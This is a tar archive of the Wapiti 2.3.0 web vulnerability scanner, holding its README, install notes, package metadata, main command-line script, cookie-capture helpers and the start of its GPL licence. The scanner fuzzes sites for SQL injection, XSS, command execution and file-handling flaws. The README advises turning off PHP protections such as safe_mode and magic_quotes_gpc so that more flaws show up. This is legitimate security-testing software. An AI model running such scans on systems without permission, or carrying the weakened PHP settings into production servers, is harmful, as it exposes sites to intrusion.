pax_global_header00006660000000000000000000000064124020151630014504gustar00rootroot0000000000000052 comment=e7c28bac831974201bd1ae3006c4a988fbea006b wapiti-2.3.0+dfsg/000077500000000000000000000000001240201516300137225ustar00rootroot00000000000000wapiti-2.3.0+dfsg/INSTALL000066400000000000000000000034611240201516300147570ustar00rootroot00000000000000Wapiti installation =================== You do not have to "install" the software on your system to make it work. If you have all the requirements on your system, just extract the tarball and launch the "wapiti" command line in the "bin" folder : ./bin/wapiti (when you are in the extracted tarball) or python bin/wapiti (if your system can't execute the script directly) Installation on Unix-like systems ================================= If you really want to install Wapiti on your system, launch the setup.py script with the following command : python setup.py install It will copy the wapiti libraries (wapitiCore) in your Python installation and place the executables in a "bin" system directory (eg: /usr/local/bin). Using Wapiti on Windows systems =============================== If you don't want to install all the requirements to use Wapiti on Windows you should look for a standalone package made with py2exe (see the available downloads on SourceForge). Then, just download and extract the zip archive and launch wapiti.exe from the Windows command line. Installing Wapiti requirements on Windows ========================================= You can't install Wapiti on a Windows system but if (for some reasons) you really want to install all the requirements then : * Download a Python 2.7.5 (or more recent) installer for your platform from http://python.org/download/ * Install it and change the PATH environment variable to append the Python path * Download a requests archive from http://docs.python-requests.org/en/latest/user/install/ * Extract the archive and call the setup.py script from the archive with "python setup.py install" * Download BeautifulSoup 3 from http://www.crummy.com/software/BeautifulSoup/ * Extract the archive and call the setup.py script from the archive with "python setup.py install" wapiti-2.3.0+dfsg/MANIFEST.in000066400000000000000000000003321240201516300154560ustar00rootroot00000000000000include README include INSTALL include TODO include VERSION recursive-include wapitiCore/config * recursive-include wapitiCore/language_sources * recursive-include wapitiCore/report_template * recursive-include doc * wapiti-2.3.0+dfsg/PKG-INFO000066400000000000000000000024651240201516300150260ustar00rootroot00000000000000Metadata-Version: 1.1 Name: wapiti Version: 2.3.0 Summary: A web application vulnerability scanner Home-page: http://wapiti.sourceforge.net/ Author: Nicolas Surribas Author-email: nicolad.surribas@gmail.com License: GPLv2 Description: Wapiti allows you to audit the security of your web applications. It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable. Platform: Any Classifier: Development Status :: 5 - Production/Stable Classifier: Environment :: Console Classifier: Intended Audience :: End Users/Desktop Classifier: Intended Audience :: Developers Classifier: Intended Audience :: System Administrators Classifier: License :: OSI Approved :: GNU General Public License (GPL) Classifier: Operating System :: MacOS :: MacOS X Classifier: Operating System :: Microsoft :: Windows Classifier: Operating System :: POSIX Classifier: Operating System :: Unix Classifier: Programming Language :: Python Classifier: Topic :: Security Classifier: Topic :: Internet :: WWW/HTTP :: Indexing/Search Classifier: Topic :: Software Development :: Testing wapiti-2.3.0+dfsg/README000066400000000000000000000201011240201516300145740ustar00rootroot00000000000000 WAPITI - VERSION 2.3.0 Wapiti is a web application security auditor. http://wapiti.sourceforge.net/ http://www.ict-romulus.eu/web/wapiti/home Requirements ============ In order to work correctly, Wapiti needs : + Python 2.x where x is >= 6 (2.6, 2.7...) + python-requests v1.2.3 or more ( http://docs.python-requests.org/en/latest/ ) + BeautifulSoup ( http://www.crummy.com/software/BeautifulSoup/ ) + python-xml How it works ============ Wapiti works as a "black-box" vulnerability scanner, that means it won't study the source code of web applications but will work like a fuzzer, scanning the pages of the deployed web application, extracting links and forms and attacking the scripts, sending payloads and looking for error messages, special strings or abnormal behaviors. General features ================ + Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...) + Can suspend and resume a scan or an attack + Can give you colors in the terminal to highlight vulnerabilities + Different levels of verbosity + Fast and easy way to activate/deactivate attack modules + Adding a payload can be as easy as adding a line to a text file Browsing features ================= + Support HTTP and HTTPS proxies + Authentication via several methods : Basic, Digest, Kerberos or NTLM + Ability to restrain the scope of the scan (domain, folder, webpage) + Automatic removal of a parameter in URLs + Safeguards against scan endless-loops (max number of values for a parameter) + Possibility to set the first URLs to explore (even if not in scope) + Can exclude some URLs of the scan and attacks (eg: logout URL) + Import of cookies (get them with the wapiti-cookie and wapiti-getcookie tools) + Can activate / deactivate SSL certificates verification + Extract URLs from Flash SWF files + Try to extract URLs from javascript (very basic JS interpreter) + HTML5 aware (understand recent HTML tags) Supported attacks ================= + Database Injection (PHP/ASP/JSP SQL Injections and XPath Injections) + Cross Site Scripting (XSS) reflected and permanent + File disclosure detection (local and remote include, require, fopen, readfile...) + Command Execution detection (eval(), system(), passtru()...) + XXE (Xml eXternal Entity) injection + CRLF Injection + Search for potentially dangerous files on the server (thanks to the Nikto db) + Bypass of weak htaccess configurations + Search for copies (backup) of scripts on the server Wapiti supports both GET and POST HTTP methods for attacks. It also supports multipart and can inject payloads in filenames (upload). Display a warning when an anomaly is found (for example 500 errors and timeouts) Makes the difference beetween permanent and reflected XSS vulnerabilities. How to get the best results =========================== To find more vulnerabilities (as some attacks are error-based), you can modify your webserver configurations. For example, you can set the following values in your PHP configuration : safe_mode = Off display_errors = On (recommended) magic_quotes_gpc = Off allow_url_fopen = On mysql.trace_mode = On Where to get help ================= In the prompt, just type the following command to get the basic usage : python wapiti.py -h You can also take a look at the manpage. If you find a bug, fill a ticket on the bugtracker : https://sourceforge.net/p/wapiti/bugs/ How to help the Wapiti project ============================== You can : + Support the project by making a donation ( http://sf.net/donate/index.php?group_id=168625 ) + Create or improve attack modules + Create or improve report generators + Work on the JS interpreter (lamejs) + Send bugfixes, patches... + Write some GUIs + Create some tools to convert cookies from browsers to Wapiti JSON format + Improve the Flash SWF parser (write a basic ABC interpreter ?) + Create a tool to convert PCAP files to Wapiti XML status files + Translate Wapiti in your language + Talk about Wapiti around you What is included with Wapiti ============================ Wapiti comes with : + a modified version of PyNarcissus (MPL 1.1 License), see https://code.google.com/p/pynarcissus/ + Kube CSS framework ( see http://imperavi.com/kube/ ) and jQuery for HTML report generation. Source code structure (wapitiCore directory) ===================================== . |-- attack # attack modules used for the vulnerabilities Wapiti can detect | |-- __init__.py | |-- attack.py # Base for all attack modules | |-- mod_backup.py # This module search backup of scripts on the server | |-- mod_blindsql.py # Time-based blind sql scanner | |-- mod_crlf.py # Search for CR/LF injection in HTTP headers | |-- mod_exec.py # Module used to detect command execution vulnerabilities | |-- mod_file.py # Search for include()/fread() and other file handling vulns | |-- mod_htaccess.py # Try to bypass weak htaccess configurations | |-- mod_nikto.py # Use a Nikto database to search for potentially dangerous files | |-- mod_permanentxss.py # Look for permanent XSS | |-- mod_sql.py # Standard error-based SQL injection scanner | `-- mod_xss.py # Module for XSS detection | |-- config | |-- attacks # Here are the text files where you can add payloads | | |-- backupPayloads.txt | | |-- blindSQLPayloads.txt | | |-- execPayloads.txt | | |-- fileHandlingPayloads.txt | | `-- xssPayloads.txt | | | |-- language # Compiled language files (.mo) | | |-- en | | | `-- LC_MESSAGES | | | `-- wapiti.mo | | |-- es | | | `-- LC_MESSAGES | | | `-- wapiti.mo | | |-- de | | | `-- LC_MESSAGES | | | `-- wapiti.mo | | |-- fr | | | `-- LC_MESSAGES | | | `-- wapiti.mo | | `-- ms | | `-- LC_MESSAGES | | `-- wapiti.mo | | | |-- reports | | `-- generators.xml # Database of report engines | | | `-- vulnerabilities # Info about vulnerability types (references etc) | |-- anomalies.xml | `-- vulnerabilities.xml | |-- file # XML parsers used by Wapiti | |-- __init__.py | |-- anomalyxmlparser.py | |-- auxtext.py | |-- reportgeneratorsxmlparser.py | `-- vulnerabilityxmlparser.py | |-- language # Manage internationalization | |-- __init__.py | |-- vulnerability.py # Common strings used by Wapiti | `-- language.py | |-- language_sources | |-- de.po | |-- en.po | |-- es.po | |-- file_list.txt | |-- fr.po | |-- generateSources.sh # Script to generate .po files from source code | |-- generateTranslations.sh # Script to compile .po files to .mo files | `-- ms.po | |-- net | |-- HTTP.py # Wrapper around python-requests, contains HTTP, | | # HTTPResource and HTTPResponse classes. | |-- __init__.py | |-- crawlerpersister.py # Class used to store and load scan status | |-- jsoncookie.py # Library to load and save cookies to JSON files | |-- jsparser | | |-- __init__.py | | |-- jsparser.py # Modified version of the PyNarcissus parser | | | | |-- lamejs.py # Home-made and lame JS interpreter using PyNarcissus | |-- lswww.py # HTML parsing is made here | `-- swf_parser.py # Home-made Flash SWF parser, not an ABC interpreter | |-- report # Report generators | |-- __init__.py | |-- htmlreportgenerator.py # The HTML generator is based on the JSON one | |-- jsonreportgenerator.py | |-- openvasreportgenerator.py # Needs some more work | |-- reportgenerator.py # Abstract class | |-- reportgeneratorinfo.py | |-- txtreportgenerator.py | |-- vulneranetxmlreportgenerator.py | `-- xmlreportgenerator.py | `-- report_template # Template used for HTML reports |-- css | |-- kube.css | |-- kube.min.css | `-- master.css |-- index.html |-- js | |-- jquery-1.9.1.min.js | |-- kube.buttons.js | `-- kube.tabs.js `-- logo_clear.png Licensing ========= Wapiti is released under the GNU General Public License version 2 (the GPL). Source code is available on SourceForge : https://sourceforge.net/projects/wapiti/ wapiti-2.3.0+dfsg/TODO000066400000000000000000000007151240201516300144150ustar00rootroot00000000000000- Improve and add reports generators - Improve the javascript interpreter (lamejs) and make it DOM aware. - Add some tools to convert cookies from Opera/Firefox/Chrome to Wapiti json format - Add some tools to convert PCAP files to Wapiti XML scan format - Improve the SWF parser (write a little ABC interpreter ?) - Add a boolean-based blind SQL attack module (current module is time-based) - Make a GUI - More work on the "domain" scope - lswww as a module ? wapiti-2.3.0+dfsg/VERSION000066400000000000000000000000311240201516300147640ustar00rootroot00000000000000Wapiti 2.3.0 lswww 2.3.1 wapiti-2.3.0+dfsg/bin/000077500000000000000000000000001240201516300144725ustar00rootroot00000000000000wapiti-2.3.0+dfsg/bin/wapiti000066400000000000000000000464621240201516300157260ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import sys import getopt import os import urlparse import time BASE_DIR = None WAPITI_VERSION = "Wapiti 2.3.0" if hasattr(sys, "frozen"): # For py2exe CONF_DIR = os.path.join(os.path.dirname(unicode(sys.executable, sys.getfilesystemencoding())), "data") from wapitiCore.language.language import Language else: parent_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) if os.path.exists(os.path.join(parent_dir, "wapitiCore")): sys.path.append(parent_dir) from wapitiCore.language.language import Language CONF_DIR = os.path.dirname(sys.modules['wapitiCore'].__file__) lan = Language() lan.configure() from wapitiCore.net import HTTP, lswww from wapitiCore.file.reportgeneratorsxmlparser import ReportGeneratorsXMLParser from wapitiCore.file.vulnerabilityxmlparser import VulnerabilityXMLParser from wapitiCore.file.anomalyxmlparser import AnomalyXMLParser from wapitiCore.net.crawlerpersister import CrawlerPersister class InvalidOptionValue(Exception): def __init__(self, opt_name, opt_value): self.opt_name = opt_name self.opt_value = opt_value def __str__(self): return _("Invalid argument for option {0} : {1}").format(self.opt_name, self.opt_value) class Wapiti(object): """This class parse the options from the command line and set the modules and the HTTP engine accordingly. Launch wapiti without arguments or with the "-h" option for more informations.""" target_url = None target_scope = "folder" urls = {} forms = [] color = 0 verbose = 0 reportGeneratorType = "html" REPORT_DIR = "report" REPORT_FILE = "vulnerabilities" HOME_DIR = os.getenv('HOME') or os.getenv('USERPROFILE') COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report") outputFile = "" options = "" http_engine = None myls = None reportGen = None attacks = [] def __init__(self, root_url): self.target_url = root_url server = urlparse.urlparse(root_url).netloc self.http_engine = HTTP.HTTP(server) self.myls = lswww.lswww(root_url, http_engine=self.http_engine) self.xmlRepGenParser = ReportGeneratorsXMLParser() self.xmlRepGenParser.parse(os.path.join(CONF_DIR, "config", "reports", "generators.xml")) def __initReport(self): for repGenInfo in self.xmlRepGenParser.getReportGenerators(): if self.reportGeneratorType.lower() == repGenInfo.getKey(): self.reportGen = repGenInfo.createInstance() self.reportGen.setReportInfo(target=self.target_url, scope=self.target_scope, date_string=time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()), version=WAPITI_VERSION) break vulnXMLParser = VulnerabilityXMLParser() vulnXMLParser.parse(os.path.join(CONF_DIR, "config", "vulnerabilities", "vulnerabilities.xml")) for vul in vulnXMLParser.getVulnerabilities(): self.reportGen.addVulnerabilityType(_(vul.getName()), _(vul.getDescription()), _(vul.getSolution()), vul.getReferences()) anomXMLParser = AnomalyXMLParser() anomXMLParser.parse(os.path.join(CONF_DIR, "config", "vulnerabilities", "anomalies.xml")) for anomaly in anomXMLParser.getAnomalies(): self.reportGen.addAnomalyType(_(anomaly.getName()), (anomaly.getDescription()), _(anomaly.getSolution()), anomaly.getReferences()) def __initAttacks(self): self.__initReport() from wapitiCore.attack import attack print(_("[*] Loading modules:")) print(u"\t {0}".format(u", ".join(attack.modules))) for mod_name in attack.modules: mod = __import__("wapitiCore.attack." + mod_name, fromlist=attack.modules) mod_instance = getattr(mod, mod_name)(self.http_engine, self.reportGen) if hasattr(mod_instance, "setTimeout"): mod_instance.setTimeout(self.http_engine.getTimeOut()) self.attacks.append(mod_instance) self.attacks.sort(lambda a, b: a.PRIORITY - b.PRIORITY) for attack_module in self.attacks: attack_module.setVerbose(self.verbose) if self.color == 1: attack_module.setColor() if self.options != "": opts = self.options.split(",") for opt in opts: method = "" if opt.find(":") > 0: module, method = opt.split(":", 1) else: module = opt # desactivate some module options if module.startswith("-"): module = module[1:] if module == "all": for attack_module in self.attacks: if method == "get" or method == "": attack_module.doGET = False if method == "post" or method == "": attack_module.doPOST = False else: found = False for attack_module in self.attacks: if attack_module.name == module: found = True if method == "get" or method == "": attack_module.doGET = False if method == "post" or method == "": attack_module.doPOST = False if not found: print(_("[!] Unable to find a module named {0}").format(module)) # activate some module options else: if module.startswith("+"): module = module[1:] if module == "all": for attack_module in self.attacks: if method == "get" or method == "": attack_module.doGET = True if method == "post" or method == "": attack_module.doPOST = True else: found = False for attack_module in self.attacks: if attack_module.name == module: found = True if method == "get" or method == "": attack_module.doGET = True if method == "post" or method == "": attack_module.doPOST = True if not found: print(_("[!] Unable to find a module named {0}").format(module)) def browse(self, crawlerFile): "Extract hyperlinks and forms from the webpages found on the website" #self.urls, self.forms = self.myls.go(crawlerFile) self.myls.go(crawlerFile) self.urls = self.myls.getLinks() self.forms = self.myls.getForms() def attack(self): "Launch the attacks based on the preferences set by the command line" if self.urls == {} and self.forms == []: print(_("No links or forms found in this page !")) print(_("Make sure the url is correct.")) sys.exit(1) self.__initAttacks() for x in self.attacks: if x.doGET is False and x.doPOST is False: continue print('') if x.require != []: t = [y.name for y in self.attacks if y.name in x.require and (y.doGET or y.doPOST)] if x.require != t: print(_("[!] Missing dependecies for module {0}:").format(x.name)) print(u" {0}".format(",".join([y for y in x.require if y not in t]))) continue else: x.loadRequire([y for y in self.attacks if y.name in x.require]) x.logG(_("[+] Launching module {0}"), x.name) x.attack(self.urls, self.forms) if self.myls.getUploads() != []: print('') print(_("Upload scripts found:")) print("----------------------") for upload_form in self.myls.getUploads(): print(upload_form) if not self.outputFile: if self.reportGeneratorType == "html": self.outputFile = self.COPY_REPORT_DIR else: if self.reportGeneratorType == "txt": self.outputFile = self.REPORT_FILE + ".txt" else: self.outputFile = self.REPORT_FILE + ".xml" self.reportGen.generateReport(self.outputFile) print('') print(_("Report")) print("------") print(_("A report has been generated in the file {0}").format(self.outputFile)) if self.reportGeneratorType == "html": print(_("Open {0}/index.html with a browser to see this report.").format(self.outputFile)) def setTimeOut(self, timeout=6.0): "Set the timeout for the time waiting for a HTTP response" self.http_engine.setTimeOut(timeout) def setVerifySsl(self, verify=True): "Set whether SSL must be verified." self.http_engine.setVerifySsl(verify) def setProxy(self, proxy=""): "Set a proxy to use for HTTP requests." self.http_engine.setProxy(proxy) def addStartURL(self, url): "Specify an URL to start the scan with. Can be called several times." self.myls.addStartURL(url) def addExcludedURL(self, url): "Specify an URL to exclude from the scan. Can be called several times." self.myls.addExcludedURL(url) def setCookieFile(self, cookie): "Load session data from a cookie file" self.http_engine.setCookieFile(cookie) def setAuthCredentials(self, auth_basic): "Set credentials to use if the website require an authentication." self.http_engine.setAuthCredentials(auth_basic) def setAuthMethod(self, auth_method): "Set the authentication method to use." self.http_engine.setAuthMethod(auth_method) def addBadParam(self, bad_param): """Exclude a parameter from an url (urls with this parameter will be modified. This function can be call several times""" self.myls.addBadParam(bad_param) def setNice(self, nice): """Define how many tuples of parameters / values must be sent for a given URL. Use it to prevent infinite loops.""" self.myls.setNice(nice) def setScope(self, scope): """Set the scope of the crawler for the analysis of the web pages""" self.target_scope = scope self.myls.setScope(scope) def setColor(self): "Put colors in the console output (terminal must support colors)" self.color = 1 def verbosity(self, vb): "Define the level of verbosity of the output." self.verbose = vb self.myls.verbosity(vb) def setModules(self, options=""): """Activate or desactivate (default) all attacks""" self.options = options def setReportGeneratorType(self, repGentype="xml"): "Set the format of the generated report. Can be xml, html of txt" self.reportGeneratorType = repGentype def setOutputFile(self, outputFile): "Set the filename where the report will be written" self.outputFile = outputFile if __name__ == "__main__": doc = _("wapitiDoc") try: prox = "" auth = [] crawlerPersister = CrawlerPersister() crawlerFile = None attackFile = None print(_("Wapiti-2.3.0 (wapiti.sourceforge.net)")) # Fix bor bug #31 if sys.getdefaultencoding() != "utf-8": reload(sys) sys.setdefaultencoding("utf-8") import requests if requests.__version__.startswith("0."): print("Error: You have an outdated version of python-requests. Please upgrade") sys.exit(1) if len(sys.argv) < 2: print(doc) sys.exit(0) if '-h' in sys.argv or '--help' in sys.argv: print(doc) sys.exit(0) if not os.path.isdir(crawlerPersister.CRAWLER_DATA_DIR): os.makedirs(crawlerPersister.CRAWLER_DATA_DIR) url = sys.argv[1] wap = Wapiti(url) try: opts, args = getopt.getopt(sys.argv[2:], "hup:s:x:c:a:r:v:t:m:o:f:n:kib:", ["help", "color", "proxy=", "start=", "exclude=", "cookie=", "auth=", "remove=", "verbose=", "timeout=", "module=", "output=", "format=", "nice=", "attack", "continue", "scope=", "verify-ssl=", "auth-method="]) except getopt.GetoptError, e: print(e) sys.exit(2) try: for o, a in opts: if o in ["-h", "--help"]: print(doc) sys.exit(0) if o in ["-s", "--start"]: if a.startswith("http://") or a.startswith("https://"): wap.addStartURL(a) else: raise InvalidOptionValue(o, a) if o in ["-x", "--exclude"]: if a.startswith("http://") or a.startswith("https://"): wap.addExcludedURL(a) else: raise InvalidOptionValue(o, a) if o in ["-p", "--proxy"]: if a.startswith("http://") or a.startswith("https://"): wap.setProxy(a) else: raise InvalidOptionValue(o, a) if o in ["-c", "--cookie"]: if os.path.isfile(a): wap.setCookieFile(a) else: raise InvalidOptionValue(o, a) if o in ["-a", "--auth"]: if a.find("%") >= 0: auth = a.split("%") wap.setAuthCredentials(auth) else: raise InvalidOptionValue(o, a) if o in ["--auth-method"]: if a in ["basic", "digest", "kerberos", "ntlm"]: wap.setAuthMethod(a) else: raise InvalidOptionValue(o, a) if o in ["-r", "--remove"]: wap.addBadParam(a) if o in ["-n", "--nice"]: if str.isdigit(a): wap.setNice(int(a)) else: raise InvalidOptionValue(o, a) if o in ["-u", "--color"]: wap.setColor() if o in ["-v", "--verbose"]: if str.isdigit(a): wap.verbosity(int(a)) else: raise InvalidOptionValue(o, a) if o in ["-t", "--timeout"]: if str.isdigit(a): wap.setTimeOut(int(a)) else: raise InvalidOptionValue(o, a) if o in ["-m", "--module"]: wap.setModules(a) if o in ["-o", "--output"]: wap.setOutputFile(a) if o in ["-f", "--format"]: found_generator = False for repGenInfo in wap.xmlRepGenParser.getReportGenerators(): if a == repGenInfo.getKey(): wap.setReportGeneratorType(a) found_generator = True break if not found_generator: raise InvalidOptionValue(o, a) if o in ["-b", "--scope"]: if a in ["page", "folder", "domain"]: wap.setScope(a) else: raise InvalidOptionValue(o, a) if o in ["-k", "--attack"]: if a != "" and a[0] != '-': attackFile = a else: hostname = url.split("://")[1].split("/")[0] attackFile = u"{0}{1}{2}.xml".format(crawlerPersister.CRAWLER_DATA_DIR, os.path.sep, hostname) if o in ["-i", "--continue"]: if a != '' and a[0] != '-': crawlerFile = a else: hostname = url.split("://")[1].split("/")[0] crawlerFile = u"{0}{1}{2}.xml".format(crawlerPersister.CRAWLER_DATA_DIR, os.path.sep, hostname) if o in ["--verify-ssl"]: if str.isdigit(a): wap.setVerifySsl(bool(int(a))) else: raise InvalidOptionValue(o, a) except InvalidOptionValue, msg: print(msg) sys.exit(2) if attackFile is not None: if crawlerPersister.isDataForUrl(attackFile) == 1: crawlerPersister.loadXML(attackFile) wap.urls = crawlerPersister.getBrowsed() wap.forms = crawlerPersister.getForms() print(_("File {0} loaded. Wapiti will use it to perform the attack").format(attackFile)) else: print(_("File {0} not found. Wapiti will scan the web site again").format(attackFile)) wap.browse(crawlerFile) else: wap.browse(crawlerFile) try: wap.attack() except KeyboardInterrupt: print('') print(_("Attack process interrupted. To perform again the attack, " "lauch Wapiti with \"-i\" or \"-k\" parameter.")) print('') pass except SystemExit: pass wapiti-2.3.0+dfsg/bin/wapiti-cookie000066400000000000000000000052041240201516300171620ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2006-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import sys import urllib import requests import getopt import urlparse import os if "_" not in dir(): def _(s): return s if len(sys.argv) < 3: sys.stderr.write("Usage python cookie.py [-p proxy_url] ...\n") sys.exit(1) if not hasattr(sys, "frozen"): parent_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) if os.path.exists(os.path.join(parent_dir, "wapitiCore")): sys.path.append(parent_dir) from wapitiCore.net import jsoncookie args = sys.argv[1:] proxies = {} try: opts, args = getopt.getopt(args, "p:", ["proxy="]) except getopt.GetoptError, e: print(e) sys.exit(2) for o, a in opts: if o in ("-p", "--proxy"): parsed = urlparse.urlparse(a) proxies[parsed.scheme] = a cookiefile = args[0] url = args[1] liste = [] if len(args) > 2: data = args[2:] for l in data: if "=" in l: liste.append(tuple(l.split("="))) else: sys.stderr.write("Usage python cookie.py [-p proxy_url] ...\n") print("Invalid key=value for web form: {0}".format(l)) sys.exit(1) params = urllib.urlencode(liste) txheaders = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} session = requests.Session() session.proxies = proxies try: if params: txheaders['content-type'] = 'application/x-www-form-urlencoded' r = session.post(url, data=params, headers=txheaders, allow_redirects=True) else: r = session.get(url, headers=txheaders) except IOError, e: print(_("Error getting url {0}").format(url)) print(e) sys.exit(1) jc = jsoncookie.jsoncookie() jc.open(cookiefile) jc.addcookies(session.cookies) jc.dump() jc.close() wapiti-2.3.0+dfsg/bin/wapiti-getcookie000066400000000000000000000113441240201516300176640ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2006-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import urlparse import sys import HTMLParser import BeautifulSoup import getopt import requests import os if "_" not in dir(): def _(s): return s if len(sys.argv) < 3: sys.stderr.write("Usage: python getcookie.py [options]\n\n" + "Supported options are:\n" + "-p \n" + "--proxy \n" + " To specify a proxy\n" + " Example: -p http://proxy:port/\n\n") sys.exit(1) TIMEOUT = 6 COOKIEFILE = sys.argv[1] url = sys.argv[2] proxies = {} server = urlparse.urlparse(url).netloc if not hasattr(sys, "frozen"): parent_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) if os.path.exists(os.path.join(parent_dir, "wapitiCore")): sys.path.append(parent_dir) from wapitiCore.net import jsoncookie from wapitiCore.net import lswww try: opts, args = getopt.getopt(sys.argv[3:], "p:", ["proxy="]) except getopt.GetoptError, e: print(e) sys.exit(2) for o, a in opts: if o in ("-p", "--proxy"): parsed = urlparse.urlparse(a) proxies[parsed.scheme] = a # Some websites/webapps like Webmin send a first cookie to see if the browser support them # so we must collect these test-cookies during authentication. jc = jsoncookie.jsoncookie() jc.open(COOKIEFILE) jc.delete(server) current_full_url = url.split("#")[0] current = current_full_url.split("?")[0] currentdir = "/".join(current.split("/")[:-1]) + "/" proto = url.split("://")[0] txheaders = {'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} session = requests.Session() session.proxies = proxies r = session.get(url, headers=txheaders) resp_encoding = r.encoding htmlSource = r.text bs = BeautifulSoup.BeautifulSoup(htmlSource) page_encoding = bs.originalEncoding if page_encoding is None: page_encoding = resp_encoding p = lswww.linkParser(url) try: p.feed(htmlSource) except HTMLParser.HTMLParseError, err: htmlSource = bs.prettify() try: p.reset() p.feed(htmlSource) except HTMLParser.HTMLParseError, err: p = lswww.linkParser2(url) p.feed(htmlSource) jc.addcookies(session.cookies) if len(p.forms) == 0: print(_("No forms found in this page !")) sys.exit(1) myls = lswww.lswww(url) i = 0 nchoice = 0 if len(p.forms) > 1: print(_("Choose the form you want to use :")) for form in p.forms: print('') print(u"{0}) {1}".format(i, myls.correctlink(form[0], current, current_full_url, currentdir, proto, page_encoding))) for field, value in form[1]: print(u"\t{0} ({1})".format(field, value)) i += 1 ok = False while not ok: choice = raw_input(_("Enter a number : ")) if choice.isdigit(): nchoice = int(choice) if nchoice < i and nchoice >= 0: ok = True form = p.forms[nchoice] print(_("Please enter values for the following form: ")) print(_("url = {0}").format(myls.correctlink(form[0], current, current_full_url, currentdir, proto, page_encoding))) for i in range(len(form[1])): field, value = form[1][i] new_value = raw_input(field + " (" + value + ") : ") form[1][i] = [field, new_value] url = myls.correctlink(form[0], current, current_full_url, currentdir, proto, page_encoding) txheaders = {'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Content-type': 'application/x-www-form-urlencoded'} r = session.post(url, data=form[1], headers=txheaders, allow_redirects=True) jc.addcookies(session.cookies) jc.dump() jc.close() wapiti-2.3.0+dfsg/doc/000077500000000000000000000000001240201516300144675ustar00rootroot00000000000000wapiti-2.3.0+dfsg/doc/AUTHORS000066400000000000000000000007451240201516300155450ustar00rootroot00000000000000Main Developer - Nicolas Surribas http://devloop.users.sourceforge.net/ http://wapiti.sourceforge.net/ A Special thanks to the following people for the work on the version 2.3.0 : * David del Pozo (spanish translations) * Alberto Pastor (spanish translations) * Mattia Barbon (bugfixing and testing) * Le Gnou & Ecirbaf from www.gimp-attitude.org (new logo) * int23h (german translations) * Sindhu Kumar (malaysian translations and Windows testing) wapiti-2.3.0+dfsg/doc/COPYING000066400000000000000000000431031240201516300155230ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, 